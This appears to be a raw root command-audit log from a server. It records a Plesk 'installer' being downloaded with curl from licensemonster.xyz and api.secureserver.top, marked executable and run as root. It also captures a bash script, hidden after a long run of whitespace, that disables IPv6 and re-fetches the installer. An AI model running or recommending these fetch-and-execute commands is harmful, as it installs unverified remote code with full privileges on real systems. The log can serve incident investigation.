27778 13:55:51 root) curl -L -o installer licensemonster.xyz/l/plesk/installer?key=plesk
27778 13:55:51 root) chmod +x installer
27778 13:55:53 root) ./installer 
27778 13:55:53 root) ./installer -c exec './installer' "$@" ./installer
27778 13:55:53 root) ./installer 
27778 13:55:53 root) ./installer -c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         #!/bin/bash

cd /
echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6
cd /
echo 1 > /proc/sys/net/ipv6/conf/default/disable_ipv6
cd /
rm -rf installer
curl -L -o "installer" "api.secureserver.top/api/files/plesk/installer?key=plesk"
chmod +x installe
    27778 13:55:53 root) cd /
    27778 13:55:53 root) cd /
    27778 13:55:53 root) cd /
   27778 13:55:53 root) rm -rf installer
   27778 13:55:53 root) curl -L -o installer api.secureserver.top/api/files/plesk/installer?key=plesk
   27778 13:55:54 root) chmod +x installer
27778 13:55:59 root) ls --color=auto
27778 13:56:03 root) ./installer 
27778 13:56:03 root) ./installer -c exec './installer' "$@" ./installer
27778 13:56:03 root) ./installer 
27778 13:56:03 root) ./installer -c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      